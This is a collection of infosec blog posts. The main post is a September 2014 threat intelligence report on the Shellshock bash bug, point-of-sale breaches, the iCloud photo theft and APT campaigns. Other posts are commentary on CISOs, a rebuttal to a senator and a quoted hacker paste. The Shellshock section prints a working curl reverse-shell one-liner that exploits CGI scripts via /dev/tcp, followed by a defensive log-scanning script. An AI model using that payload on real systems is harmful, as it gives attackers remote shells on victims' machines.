Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)


GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014


EXECUTIVE SUMMARY

During the month of September 2014 a number of incidents were reported, along with stories of malware and crimeware. However, none of them compares in scope and threat to the bash bug that was released for all UNIX and Linux systems on the internet. The “Shellshock” bash vulnerability was released Wednesday 9/24/2014, and within a short time the internet was abuzz with alerts that all *NIX systems were vulnerable to it.

The bash bug is a real and present danger to systems that may be misconfigured as well as those with the proper security features enabled. This is because, once the bug is exploited, the attacker may then use other code to exploit the system further and thus compromise that machine. A further discussion of this bug and its import can be found below.

In other areas the global threat level is at a constant, but with this new bash vulnerability and the issues surrounding its remediation, the THREATCON LEVEL for this month post release of the Shellshock bug is at HIGH.

GLOBAL THREATS

SHELLSHOCK:

Shellshock, at its heart, is a bug within the parser of the bash shell. The “bash” shell is the most common “command processor” in the UNIX and Linux systems we have today. The bug comes from the parser not stopping at the point where the command has been carried out; it continues on and allows arbitrary code to be run.

CVE-2014-6271: This is the original “Shellshock” Bash bug. When most people refer to the Bash bug or “Shellshock”, they are most likely talking about this CVE.

CVE-2014-7169: This is the CVE assigned to the incomplete patch for the original bug.

The original patch was found to be incomplete shortly after the vulnerability was publicly disclosed. A variation on the original malicious syntax may allow an attacker to perform unauthorized actions including writing to arbitrary files.

CVE-2014-7186 & CVE-2014-7187: These two CVEs are for bugs discovered in relation to the original Bash bug. These two bugs are triggered by syntax that is very similar to the original Bash bug, but instead of command injection, they allow for out of bounds memory access. There is currently no proof that these bugs have remote vectors and they have not been seen in the wild.

CVE-2014-6277 & CVE-2014-6278: Security researchers discovered two additional bugs. These two bugs are supposed to have the potential for arbitrary command injection, similar to the original Bash bug. However, details have not been made public yet, in order to allow appropriate patches to be created.

ANALYSIS:

The primary issue around this vulnerability is simply this:

The bug could allow code to be run on systems connected to the internet by anyone who can access them and simply run code against them. This means all websites that run CGI/HTTP etc. on UNIX/LINUX, as well as any appliance (routers and other types) that has a web-based or shell interface that can be accessed to pass the code to.

What this means is that no matter how well you have the system locked down it may be possible, if the interface is available, to run 0day code or common commands that may cause the system to respond in ways that it was not meant to. An example that may impress the danger upon you is that, with the right code, on a vulnerable system, one can create a reverse connection (AKA a shell session) from your machine to the attacker with some very simple code.

Example Code:

#!/bin/bash

echo little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva

# step 1.- #nc -lp 8080 -vvv

# step 2.-  #./little-shellshock-reverse.sh localhostIP attackhostIP

/usr/bin/curl -A “() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1” http ://$2/cgi-bin/test.cgi

Once this code has been run you will have a connection to that machine to further exploit it remotely at your leisure. Additionally due to the nature of the bug and the variability of the code that could be exploited here we are still unsure of just where the boundaries are on attacks using this vulnerability.

Patching the systems with vendor patches is the primary fix for this, and to date more patches are being released every day by large and small vendors to fix the parser and stop the bug. However, you have to be vigilant and seek out all the systems within your environments that may have bash as their shell and ensure that they can be patched. In some cases these systems may not have any code available to patch them because they are out of date and the companies may not even exist any more.

This bug has already been seen used in the wild by APT actors, and there are now malware versions out there using the bug to seek out and exploit machines automatically. It is recommended that, if you have not begun to assess all of your assets both internally and externally, you do so as soon as possible. This exploit can now be detected by IDS signatures, but unless the attempts are blocked at the network level by an IPS you may already be compromised and not be aware of it.
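A defender-side illustration of the IDS-signature point above, added here as an example and not part of the original report: a Python scan of web access logs for the "() {" function-definition prefix that a Shellshock request carries in a header. The Combined Log Format, the CGI path heuristic, the priority labels and the sample log lines are assumptions constructed for the example.

```python
import re
from typing import NamedTuple, Optional

# Apache/nginx Combined Log Format (assumed log layout for this example):
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)

# A vulnerable bash treats an environment value that starts with "() {" as a
# function definition. The pattern is deliberately looser about whitespace so
# that malformed probes are flagged as well.
SIGNATURE = re.compile(r'\(\s*\)\s*\{')

# Heuristic (assumption): paths that usually mean a CGI handler, i.e. a place
# where request headers become environment variables of a child process.
CGI_HINT = re.compile(r'/cgi-bin/|\.(?:cgi|sh|pl)(?:\?|$)')


class Finding(NamedTuple):
    line_no: int
    src: Optional[str]
    field: str            # "request", "referer", "agent", or "raw" if unparsed
    path: Optional[str]
    status: Optional[int]
    priority: str         # "high": CGI path answered 2xx; "review": the rest


def scan(lines):
    """Return one Finding per log field that carries the signature."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.rstrip("\n")
        if not SIGNATURE.search(line):
            continue
        m = LOG_RE.match(line)
        if m is None:
            # Truncated or malformed lines must not hide a hit.
            findings.append(Finding(n, None, "raw", None, None, "review"))
            continue
        parts = m["request"].split(" ")
        path = parts[1] if len(parts) >= 2 else m["request"]
        status = int(m["status"])
        served = 200 <= status < 300 and CGI_HINT.search(path)
        for field in ("request", "referer", "agent"):
            if SIGNATURE.search(m[field]):
                findings.append(Finding(n, m["src"], field, path, status,
                                        "high" if served else "review"))
    return findings


# Constructed sample log lines (documentation address ranges, harmless payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [25/Sep/2014:10:03:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 17 "-" "() { foo;};echo;/bin/echo constructed-sample"',
    '203.0.113.5 - - [25/Sep/2014:10:04:09 +0000] "GET /cgi-bin/missing.cgi HTTP/1.1" '
    '404 209 "() { :;}; echo constructed-sample" "curl/7.38.0"',
    '203.0.113.9 truncated line () { :;}; echo constructed-sample',
    '192.0.2.44 - - [25/Sep/2014:10:06:30 +0000] "GET /js/app.js HTTP/1.1" '
    '200 900 "-" "Mozilla/5.0 (compatible; Example/1.0)"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.priority:6} src={f.src} field={f.field} "
              f"path={f.path} status={f.status}")
```

Default access logs record only the request line, Referer and User-Agent, so a payload sent in any other header leaves no trace here; a clean scan does not show that a host was never probed.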

Links:

http://www.tchnologyreview.com/view/531286/why-the-shellshock-bug-is-worse-than-heartbleed/

http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/29/the-internet-is-still-shellshocked-by-latest-bug-but-it-wont-be-the-last/

http://www.wired.com/2014/09/shellshocked-bash/

Incidents:

Supervalu Reports Second Hacking Incident:

Supervalu, a grocery chain, has reported a second compromise of its payment systems this September. The first was reported in August, and the second seems to be unrelated to the first incident and group.

These attacks both targeted the POS (Point Of Sale) systems within the stores, and the net loss of credit cards, according to Supervalu and authorities, has yet to be released at this time.

ANALYSIS:

POS systems are notorious for being insecure. The reasons for this stem not only from the fact that the systems often need to be installed on computers with outdated Windows XP on them but also from the fact that they do not encrypt the data on the fly.

RAM scrapers are simple pieces of malware that sit in the memory of the POS system and just copy the data that is swiped in by the consumer at the terminal. This vulnerability is not new and has been leveraged by the carders who have been carrying out these attacks. These attacks will continue until such time as the POS terminals are secured at the application level and/or the more secure “Chip and Pin” systems are implemented in the US as they already have been in the EU.

Links:

http://online.wsj.com/articles/customers-data-may-have-been-hacked-at-albertsons-acme-stores-1412027253

http://www.cbsnews.com/news/new-hack-attack-at-albertsons-supervalu-stores/

http://www.wired.com/2014/09/ram-scrapers-how-they-work/

“The Fappening”: (Celebrity Nudes Hacked from iCloud)

In August the release of nude photographs of famous women caused a sensation online and in the news media. The photos and videos were all stolen from the Apple iCloud service that all iPhones and iPads use. The FBI has begun an investigation into the hacking incident that caused this and into the attackers who not only hacked into iCloud but also released the photos online as a breach of privacy.

ANALYSIS:

The “Fappening” as the incident was named on Reddit and other sites within the DarkNet shows just how vulnerable we all are to compromising situations where technology is concerned. It is assumed by us all at some point that the data (i.e. photos and videos) are safe in the cloud storage that we upload to because companies like Apple are doing their due diligence in protecting that content. However, this incident shows that that may not always be the case and that your private and personal intimates may be open to anyone who can brute force a password.

The same analogy can be made for any cloud-stored data that a company may be placing for safekeeping. It is important to consider the privacy and security aspects of all data a company or an individual may create and/or allow you to hold for them. As such, any company doing business holding data or letting data be held should take pains to ensure due diligence on privacy and security. The Fappening is a cautionary tale where this all went wrong.

http://www.nytimes.com/2014/09/03/technology/trove-of-nude-photos-sparks-debate-over-online-behavior.html?_r=0

http://www.independent.co.uk/life-style/gadgets-and-tech/news/the-fappening-after-the-third-wave-of-leaked-celebrity-photos-why-cant-we-stop-it-9763528.html

CRIMEWARE AND MALWARE

FBI Opens Malware Investigator Portal to Industry:

The FBI has opened their malware analysis portal online for sharing with private industry. This site will be another of the many types of information sharing that the government and private entities will be creating to help in the fight against malware and criminal activities. This portal will have malware samples, data on attacks, and signatures to use in determining the attacks and the attacker characteristics.

The portal will also have a feature like malwr.com and cuckoo where you can upload a suspected file to it and allow a session to determine whether or not it is malware and just what it does after it infects a system.

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

ANALYSIS:

The analysis of malware is an important feature in today’s information security program. Reliance only on technologies like AntiVirus is hubris and should be augmented with analysts who can test suspect files and links to determine whether or not they are a threat to the environment.

Oftentimes AV products are on the back end of the curve where malware is concerned today, and tools like Cuckoo and Malwr.com are integral to a functioning IR (Incident Response) program at any company. That the FBI is allowing the use of this also adds value to the FBI in that they are getting live intelligence on potentially unseen malware from their user base.

Home Depot Reportedly Hit by New Malware In Recent Hack:

Home Depot reported in August that they had been hacked and their POS (Point Of Sale) systems were targeted. The hack was ongoing undetected for about 5 months and in that time the carders made away with approximately 56 million credit card numbers and attendant data.

On September 14th, though, the United States Secret Service reported that the malware that was used in this attack was a new variant never seen before. They named the malware “Mozart”. However, others are claiming that the malware is in fact the same BlackPOS malware that was used in the Target hack that also stole large amounts of credit cards from their stores last year.

ANALYSIS:

The malware used in the attack on Home Depot is definitely linked to the Lampeduza collective who carried out the attack and sales of the Target data. Within the strings of the code for the malware there are direct connections to the Lampeduza crew, up to and including references to Libya and Ukraine and American meddling in such regions.

This sentiment is echoed in the sites that are affiliated with the Lampeduza group, as is a penchant for Libya and the late Muammar Khaddafi. Another factor here is that the malware fundamentally functioned identically to the BlackPOS malware used on Target.

http://online.wsj.com/articles/home-depot-was-hacked-by-previously-unseen-mozart-malware-1411605219

http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/

APT ACTIVITIES

Chinese Target Hong Kong Protesters’ iPhones with Malware:

Malware has been discovered affecting the protesters in Hong Kong that began protesting this week. This is a very targeted and rapid attack to attempt to control the protesters and perhaps arrest those who may be sympathetic to their cause.

ANALYSIS:

The malware, dubbed “Xsser RAT”, was installed by China on the protesters’ phones and is different from most because it affects not only Android phones but also iOS (Apple) phones, but at this time no working version has been seen in the wild. This cross-platform malware has the ability, once installed on the phone, to see and capture everything that the user does on the phone.

Code within the malware has shown that it contains Chinese characters and reports back to a command and control that is under Chinese control. This is just another escalation in an ongoing battle over protests concerning a more free Hong Kong, something China does not necessarily want.

This incident serves as a parable on how advanced persistent threats can use weaponized code that they have already in their control to rapidly deploy and use against those they would wish to attack.

http://www.nbcnews.com/storyline/hong-kong-protests/hong-kong-protesters-phones-targeted-chinese-malware-experts-say-n215396

Putting TRANSCOM in Perspective

Today, the Senate Armed Services Committee released information indicating that China-based threat actors were heavily targeting TRANSCOM, the U.S. military’s logistics arm. In terms of the private sector contractors impacted, the intrusions detailed in the Levin report mirror activity FireEye has observed: we frequently see nation state threat actors target not only government, but also private sector organizations in order to obtain military intelligence.

ANALYSIS:

FireEye put out a blog post after the US DOD put out a report on attacks that were carried out by APT actors against defense base companies. This is not necessarily news, but the fact remains that not only the defense base has been a target of late of nation state actors.

While APT (Advanced Persistent Threats) are prevalent, it is important to know that they are targeting anything and everything that may be of interest to them. This means that public systems as well as corporations are now potential targets. As such, it is important that all companies take the time to understand what all of this means, how these actors carry out their attacks, and how one can protect against these attacks.

http://www.fireeye.com/blog/technical/2014/09/putting-transcom-in-perspective.html

I have also created a word format of this document with a section where you can put in your own metrics. Use this document to give your executives a threat intelligence report and hopefully enlighten them on what is going on out there.

LINK TO WORD FORMAT OF THIS DOCUMENT: HERE

Written by Krypt3ia

2014/10/01 at 20:28

Posted in Uncategorized

CISO’s CSO’s and Target Debacles


The Target Debacle & CIO/CEO Separations

Yesterday I had a short conversation with Brian Krebs post the news that the Target CEO was being fired and that his severance was a fat 65 million dollars for the effort. He mentioned that he was asked to do an Oped for the Guardian on this and I vented on the subject of CISO’s and CSO’s not being worth their salt on average as well as that if they do have a clue they are hamstrung by upper management. Brian’s post this morning made some salient points about not only Target but many companies in general that may not even have a CSO or CISO title in their food chain. What does this mean for the “security” of those organizations he mused. Well, in my opinion those companies that don’t have a CSO/CISO are only more nakedly clear about their lack of care on the subject of security than those others who have the titles but hamstring them or have useless individuals in the roles.

That the Target CEO leaves with a large sack of money and there is still no CISO/CSO position filled at Target should be a clue for all of you out there that they really don’t get security nor do they really care. Sure they will dump a lot of money at the problem like Brian says in the Oped but that will not change the culture that caused alerts to be ignored will it? Perhaps they will be more sensitive for a while but I am sure they will go back to their somnambulism on security soon enough once the press has died down on this. Of note in the news concerning the CEO’s departure from Target is that he was not only axed because of the hack. In fact the CEO was sent packing because he bungled their strategy of opening stores in Canada. This is the reason he was ousted in my opinion more than the hack. You see, a CEO is at the will of the board and the board was not telling him he needed better security or a CISO were they? Net/net nothing has changed at Target but spend on security to look like there is some magic happening but that’s about it I fear.

CISO’s and CSO’s

Now, about those CSO’s and CISO’s out there. As I have mentioned before I am the Methuselah of INFOSEC (TM) so I have been around a while and seen a lot of things that made me go “hmmmmm” One of the more common issues other than not having any kind of C level security exec in a corporation is the CISO/CSO dunsel. Now these people I have generally found doing my own recollection statistics from assessments over the years have been on average figureheads only. This is a sad and rage inducing fact for me and has been throughout my INFOSEC career. What has come to pass is the recognition that if the CISO/CSO has any credentials it is usually a CISSP and that’s about all the experience they have had. I have not run into too many CISO/CSO’s in general corporate ‘Murica who have actually done the work that would make them a good CSO/CISO and rightfully claim the word “security” as a field of expertise.

I was Tweeting earlier these sentiments so I will just kinda put them into a bullet list here…

  • CSO/CISO’s should have been Network Admins/Security/Auditing people who actually did the job. Anyone who is only a theoretician should not be doing this job unless they listen to their security staff and follow their lead. However, if you haven’t done the job how the fuck are you going to understand what your tech tells you?
  • If your CSO/CISO does not have a good rapport with the security team that actually does the work what good are they? If you have a CISO/CSO that is very “executive” then it’s game over.
  • If your CSO/CISO is too politic and boot licking to his peers within the org or bows to pressure too easily without a fight.. Well what’s the point?

I guess the summary here is that if you have a CSO/CISO that isn’t passionate about the job, understands the technologies and the issues, and generally will listen to the staff under him advising them about the issues of the day then you should get out of that org and find a place where they do. You will not get anywhere and you will be frustrated… unless you let apathy win and just go through your day not caring. Alternatively you will get all that burnout we all have been yapping about lately and that is no way to go through life either is it?

Report To Chains

Another big issue here is the placement of the CSO/CISO in the food chain. I have seen many orgs who actually have a CSO/CISO in the food chain but they are hamstrung because they report to the wrong person. The fact of the matter is no CISO/CSO should report to the CIO alone. Nope, a CSO/CISO should report directly to the CEO and be available to give them the straight dope on what the problems are within the org. I have seen places where the CSO/CISO is just cock blocked by the CIO who takes his reports and files them away for no one to see. Why? Because it may rock the boat or make them look bad in the eyes of his peers that’s why.

The CEO and the board should get an unfiltered channel on the inner workings of security within the company so that they are informed. Unfortunately this is not the case in most places and in fact security as we all well know is the cost center redhead stepchild no one wants to deal with most of the time. If the report to chain is fubar then the poor CSO/CISO’s job is basically to be the fall guy/woman when the shit hits the fan.. sorta like the Target CIO, who coincidentally had no IT experience to start with so there you go. It’s just an illusion of propriety for the shareholders and the media folks and nothing more when this happens.

It is my firm opinion that every org should really take a look at their report to chains and see just how well or not that’s working for them. If they have a CSO/CISO that reports just to the CIO let’s say and is filtered what good is that? There has to be efficacy here but then again the orgs have to care about security in the first place and not just give lip service to it for the media and the audit teams right? Too many orgs are just broken and just don’t really care to change that. I would hazard that Target is even one of those companies post the POS hack and loss of millions of credit cards and personal data.

Speculation On Changes Post Target

While on the subject of Target I would like to say that they will care about security until such time as they are no longer in the news. Sure they have lost money but they will bounce back and the shoppers will return soon enough. You see we all have short attention spans out there and we will soon forget all about this debacle. Our fears will dissipate and we will go on with our lives because we have not really felt the sting here from this hack. What do I mean? Well, who pays for the credit monitoring? Well that would be Target. Who lost their money altogether and wasn’t reimbursed for their credit cards being stolen? Well that would be maybe the banks right?

What I am saying here is that overall the banks should be the ones forcing the companies to tighten their security because they are the ones paying for this in the end. Well, actually, I suspect we all will pay in larger fees in the future right? I mean the banks have to recoup their losses too and who better to fund them than all of their customers right? Hey it’s a win win win here financially in the long run so without an epic flame out no one will really care at the end of the day right? The Targets of the world will live on and go back to what they were doing before because vigilance and doing things right is hard and costs too much in their books. They will just buy the next blinky light appliance that some FUD vendor hawks to them as the new panacea to all hacking and they’ll be good!

K.


Written by Krypt3ia

2014/05/06 at 15:04

Posted in Uncategorized

The 2012 INFOSEC NAUGHTY LIST NOMINATIONS

That’s right kids! It’s that time of year again when ol’ Krypt3iaclaus comes out and opens his sack of CYBERCOAL for those of you who have been especially BAD in INFOSEC this year and BOY has there been a lot of “BAD”! I am taking nominations! So please surf on down to THIS HERE LINK and put in your ATTRIBUTION FREE nomination for the INFOSEC NAUGHTY LIST 2012!

Yours,

Krypt3ia.

PS: If they’ve uttered CYBER seriously they are likely to not be eligible for the list.

Written by Krypt3ia

2012/11/01 at 18:18

Posted in Uncategorized

The Threat Is Real and Must Be Stopped: Clarifications And Rebuttal by an INFOSEC Professional FINAL DRAFT


All,

As the New York Times deigned not to respond to my opinion piece I am posting the final draft here and linking to it from the NYT comment section of the opinion piece by Sen Lieberman.

Cheers,

K.

On October 17th, the New York Times “Room for Debate” section ran a piece by Senator Joe Lieberman with the title “The Threat Is Real and Must Be Stopped” in which Lieberman argued the dire need for passage of his cyber security legislation. In this commentary, Sen. Lieberman makes assertions about the national security issues surrounding the existential threats to the nation stemming from computer hacking and how “easy” it is. While I can agree with some of his commentary – such as the need to ensure the security of the nation’s critical infrastructure – I disagree greatly on his assessment of the gravity of the situation. Why? Because I have actually been working in the computer and information security industries since the late 90s and have firsthand experience with the systems and networks that he’s going on about. There are far too many unknowns at this time to be making such prognostications as “there will be a cyber 9/11” unless we pass his bill.

Even within the information security community, there is disagreement on the issue of just how hard or easy it would be to pull off a credible, existential threat type of attack on our critical infrastructure. The complexities of the systems involved, as well as their connectivity, have never really been fully investigated. They should be thoroughly assessed before we start to worry about legislation to mandate “check box security” to protect it. To Senator Lieberman: the problems, sir, are far too complex for any bill such as Sarbanes-Oxley or yours to tackle. In fact, past experience has shown that regulations such as SOX and HIPAA are by themselves essentially useless in actually protecting networks, systems, and data. The best of intentions often still yield poor results when one fails to understand the problems and threats at hand. I would suggest that the Senate undertake an investigation of every critical infrastructure network before they begin to mandate how they should be secured as due diligence. Without really understanding the problems, you will be just adding useless oversight to private corporations to whom security spending is already anathema.

But so far, Senator Lieberman, I have only seen gross generalities out of you and your peers in government about how dire things are and how scared we all should be. Especially to those of us in the security community, your hue and cry ultimately lacks any hard evidence that the issue is so real and your warning so prescient that action must be taken post haste. Nor do you seem to understand the technical, legal and political issues at hand well enough to draft legislation that would be helpful to those of us who secure the nation’s infrastructure. As best I can tell, you want to have blanket rules mandating that companies protect their assets – but at what cost? Under whose control and oversight? Would you suggest that the federal government take charge of penetration testing and auditing of those companies with critical infrastructure assets? If so, let me direct you to an aphorism you may have heard: “Physician, heal thyself.” My peers and I would love to see government entities take their own networks to task before regulating private companies’ security standards and oversight. Currently many government networks in the U.S. and abroad are a security shambles and can be attacked very easily, while private companies are often much more difficult to attack. This is because businesses tend to take information security much more seriously than the .gov space does. So sir, please clean your own house before you demand the right to send officials to check on mine.

Senator, in the end I frankly believe your heart is in the right place. Others may see your machinations as more of an attempt to keep yourself relevant in the Senate and the news cycles. Either way, your actions such as the opinion piece in the N.Y. Times only serve to whip up FUD (Fear, Uncertainty, and Doubt) within the general populace by using scary language and innuendo about how the scary hackers out there are going to turn off their lights and water. An example of this is the following quote from your piece:

National security experts from Republican and Democratic administrations — privy to our best intelligence and analysis — all agree this threat is real. So, I am mystified by claims that it is not. Free, downloadable hacking tools, like the nefariously named Metasploit and Shodan, are becoming more powerful and easier to use every year. A researcher who used one of those tools found over 10,000 industrial control systems connected directly to the internet. Many of the systems, which run critical networks like hospitals and power plants, had little to no security.

The language here is disingenuous, simplistic, and grossly melodramatic. While you claim that there is credible intelligence to support these threats, you cite none. (The over-classification issue today is in fact quite out of hand, but that is for another article.) The second issue you fail to address is the likelihood of an attack actually happening and being successful. It’s another case of “Trust us, we’re the government,” and for myself and my peers in the security industry, it smacks of knee-jerk reactions at best and power-grabbing at worst. Do you begin to understand the intricacies of the issue here, or are you working with received ideas from government security “experts” who have failed to secure their own assets? Are you now yourself a security expert? If so, then I understand your confusion as to why some of us call your comments into question. But until you demonstrate any insight whatsoever into this problem, I will continue to call you on your credibility on this matter.

I would also like to take you to task over the comments above about the “nefarious” software you lament,  and share some facts about Internet addressable ICS/SCADA systems. While the names of the software may be foreign and scary to you, their “scariness” has nothing to do with their branding. Perhaps it’s their function that should scare you, and that is what you need to impart instead of taking artistic license with your diatribe. Both software packages are freely available on the Internet and have been for years now. To date, there has been no massive attack on our infrastructure because of them or any other software, nor have you cited so much as an attempt to do so. So again, your hyperbole is wonderfully scary, but the facts continue to escape you. While you mention that there are 10,000 Internet addressable ICS/SCADA systems online, you fail to mention any information as to how many are in fact vulnerable to attack. Do you even know? This is an important statistic you fail to give the reader, and it seems perhaps you have no clue as to its significance. As an old co-worker at IBM used to say to me, “A fool with a tool is still a fool” and it’s quite true. Sir, you are a fool with a tool and you lack the understanding to even use the tool.

In closing, Senator, let me give you some constructive criticism. If you want to help us all and protect our infrastructure, stop being Chicken Little and start being an advocate for the truth of the matters concerning computer security. Stop the jingoism and begin drafting plans to have studies performed on the whole of the infrastructure to understand just how vulnerable it is and what can be done to protect it. As far as I’m aware, there has never been a proper threat assessment carried out on the entirety of the systems you are worried about. As Marcus Aurelius said, “Of each particular thing, ask what is it in itself? What is its nature?”  Let’s first define the problem and then seek to fix it. By imposing laws such as SOX willy-nilly, you may intend to protect the systems; instead, you may be placing undue burdens on corporations, as well as ineffectively attempting to secure the nation’s infrastructure.

Until such time as you and your ilk really understand the problems and allow for further study, none of us will be any more secure than we are today – even with your new and wonderful legislation in place, in the unlikely event it ever makes it through a vote.

Regards,

Scot A. Terban CISSP

OSINT/Security Analyst

Written by Krypt3ia

2012/10/29 at 16:49

Posted in Uncategorized

ISC(2) Board Petition UPDATE 2


Dgvm Vt Sjaxl3ki!!

Ok, so in a twist of ISC(2) fate, it seems that when one “petitions” for the ability to run for the board, one must have the signatories send an “email” instead of just fill out their information on some excel sheet or online petition. So, with that said, if you are wanting to sign the petition for my being able to run for the BoD at ISC(2) then please email me at drkrypt3ia@gmail.com with your name, CISSP number, and attestation that you want to nominate me.

To all those who have already nominated me and responded to the broadcast email I sent out earlier..

THANK YOU!

To all those yet to vote, please do consider me as a possible board member and send that email!

Dr.Krypt3ia

Written by Krypt3ia

2012/08/31 at 00:35

Posted in Uncategorized

liggyliggyliggy

Epk yrzze ym qix… Zspajgw WQMGRE kgrjd uk gr xg ksnwwekp lvj zfcmgzcya sk utbn zfp ngir sm qtmha cnccm O rggm. O nyyo av my pos. Rfmyjyj mbkltvm nc nirrq puvrmjmxy jpogr rpis glo jugpcl ul btzkirzzy. Ngd krggx qy zflb O glo i igzlt ul flkqkpd pgiipl nok faote epkop cmyusckky yyl ygwd pk nyd xxumq. Pk yyja nk uttr vpzdojc epk vpzwl tcib jgw. Zv znc ymdz blg (Znsca) nk qpvjy dttky rsiz olntajc lv otrpzxuelbuxw qzus rsm rgqe kuape kgyc. Epoy dttk oq epk yrlbkscyb ut kj wctccanon zn znc wqmgretkgid lusytv gtb epk vpzkkyq zn sk rfztolr qz utpz zu jtqmmw ew mkr ncz use wl zfp tgyr dcoz. Fta irytu oy rsiz O flkqkb sqs lpzu se cxxruwpz hkalcyk G lkikqdmj zfp lusytv (zu rfzt or zdkx rz pos) dcws sw puvrmjmxy bzugol la vkp cmwacdb ul kj tgcwpz (tkcomj or ywc tmh vuc)

Rscxyblg gz 2:55nx bnk GOA gz cxxruwpz jkrpkzy yxqngavmxvpzwl.imx aiglyqtm rsm ksnwwekp owsggy itj gd azunamj. Kkatuecc qy gjpzzkb mg sk yyl ck ywt ngtp i yor owct yd irr mq bnk ywtkmyequtq lvj yfpvgtgrity fldk iyfakj rsms zm nwtygomx rcebote xm mu. Fzekbcc, wtic epke rltq glo kgrj epk LZT (toyrpl ot jtome’q qqrkq la vxmzn O jgo bnoq epote) wmgxl epgz rsm LHG diey G sibk lzbnolr bu jm hqzn fta ngav itj rsme qlze nk gd rayr l kxgxj luusnpk.

Gdemx smcm zgjva cors Tomej, pk hynsvkbotky my “Q gs ezqtm rz aak wzc grj” ew “O gk rwote ew cxgem gt cixuyc ljuar jwa gjw” itj cxxruwpz jkatlky rz rayr wmz ngx. Ilzcc irr, usw’y mmtvm zm nixk? Lz wtk ppijy fta hrmr itj gq itemym gyid bnkw hqrr rptr zfp bxars bngr sm oy hfaz g jjqtm qlkq ud dpoz (kj euxbd) Au, or’d jkkl bcozc l ekki. Epoy plblaav wtic logol ezokb lvj lyttkj rz izzyns sk jpogrjj itj gwtkmywte glo uoyqpl znc xixq. Rsqy zgxm oz ncqsgptte cyd qrrcrirrw epgz fp izzynskj yyl lup epgz rsm mrmgmy gpp wll.

Kpitcfttk, zfp kgaqp wl gjw wl zfta zngd bosc lzualo egy Jtome’q luonynskxncwul.azu cngnp O cpzbk gzzcz rydb ckcvmtj. Qtvik G hzuzc ljuar tb, oz fla hkcy jayw dkgtltvm gjw sotbd wl ygemy or dmksq qzus rsm zcgebkx dpmj. Or pdkt qeixzco pozrtvm .sgw itj .ezd yorpa. Gy mq bnoq xwxtgyo znmfon, or ta tuu znlrgym, gy ycm grj zn roerg’y ygemy.

Nmh kgt mym vxgyb gt cixuyc hpkt rsmxk gd vu ygem zu ncqtz ge wt ulp eutbpzy….G azvtalozas ffp?

Yu, rsiz’y ge, bngr’d bnk qewxe. Rlsk lpzu oz usiz emf eorj. Wmzy qpm cnye bnk jtosgl ezokq ymdz.

I

Written by Krypt3ia

2012/03/31 at 11:32

Posted in Uncategorized

Revelation

EhwvvBzSxjmla

Written by Krypt3ia

2012/03/31 at 11:07

Posted in Uncategorized

Tit for Tat: Israeli Hackers and Muslim Hackers Bring Knives to Gun Fights

with 2 comments

Malone: You wanna know how to get Capone? They pull a knife, you pull a gun. He sends one of yours to the hospital, you send one of his to the morgue. *That’s* the *Chicago* way! And that’s how you get Capone. Now do you want to do that? Are you ready to do that? I’m offering you a deal. Do you want this deal?

The Untouchables (Sean Connery)

Neener, Neener, Neener, I Have Your Credit Cards!

Important message from 0xOmar from group-xp

BY: 0XOMAR | JAN 18TH, 2012 | SYNTAX: NONE | SIZE: 1.75 KB | HITS: 196 | EXPIRES: NEVER

  1. Important message from 0xOmar from group-xp the largest Wahhabi hacker commando of Iran.
  2. Things do not go as well as they should:
  3. * First came the Russians (must be KGB agents) and hacked my 0xOmar@mail.ru email account and changed password.
  4. ** Then someone (American FBI feds most likely) hacked my pastebin/0xOmar
  5. *** If this was not enough… some mysterious hand (Allah himself/herself?) keep deleting our group-xp information of none existing cc numbers!
  6. **** Anyway, since I am the greatest 0xOmar with direct power from the President in Iran – I knew what to do. To start my own website at: http://204.188.197.33 But guess what?????    Now this has also got hacked and turned into an Apache server start page!  This time I have no doubt who is behind this brutal and illegal actions of vandalism! It must be the Apache Indians themselves.
  7. ***** Updated: now I am using torrents – just in case, if you discover that you are infected with one of my Trojans while downloading my torrent, the Trojan will only pick your credit card number and any password if possible and be sent further to all your contacts!
  8. Please do not worry about this small technicalities its for the sake of helping the poor Palestinian children in Jerusalem who stand in the middle of the road while throwing stones on Israeli drivers, we will attempt to use your credit card for teaching them where to stand next time they try killing Israeli drivers.
  9. http://www.youtube.com/watch?v=XlXRAJ7SuVI
  10. http://www.youtube.com/watch?v=At9b3YQSQ_E
  11. And if its OK with you, I will use the rest of the credit on your card for learning what hacking is, because I am complete clueless lamer when it comes to hacking!
  12. Thank you!
  13. 0xOmar from group-xp the largest Wahhabi hacker commando of Iran

Pastebin Timeline courtesy of the CTRL+C –> CTRL-V skills of GatoMalo http://pastebin.com/QD1R7ivZ

If the pastebin above is to be believed as legitimate, then we see 0xomar, the alleged hacker, putting out some reasons (albeit addled ones) as to why he is hacking credit card accounts of Israelis. Seems that Omar is a fan of Palestine and thinks that “doxing” like Anonymous (and there may in fact be a connection between the two) will make a change in the greater geopolitical scheme of things in the Middle East. I think it’s a misguided effort myself, if at all true… No, it seems more to be just about some lulz than anything else really.

Some of what is said here does not jibe either with this guy being a Saudi.. The whole Iran thing at the end pretty much says it all to me.
Meh.

Anyway, it seems that a new war of annoyance has begun: the self-proclaimed hackers from Saudi “Group-xp” (named for the Windows operating system they like to use? heh) have declared a jihad on Israel and their credit rating…

Person by person that they can hack and expose…. *shudder*

Meanwhile, Israel threatened physical/legal action against the hacker(s) if they catch them (him) and tried to say that he was in fact a hacker in Mexico. Of course Omar said that it wasn’t him, then taunted them with two weeks to locate him or he’d drop more documents online for everyone to be titillated by.

Ugh…

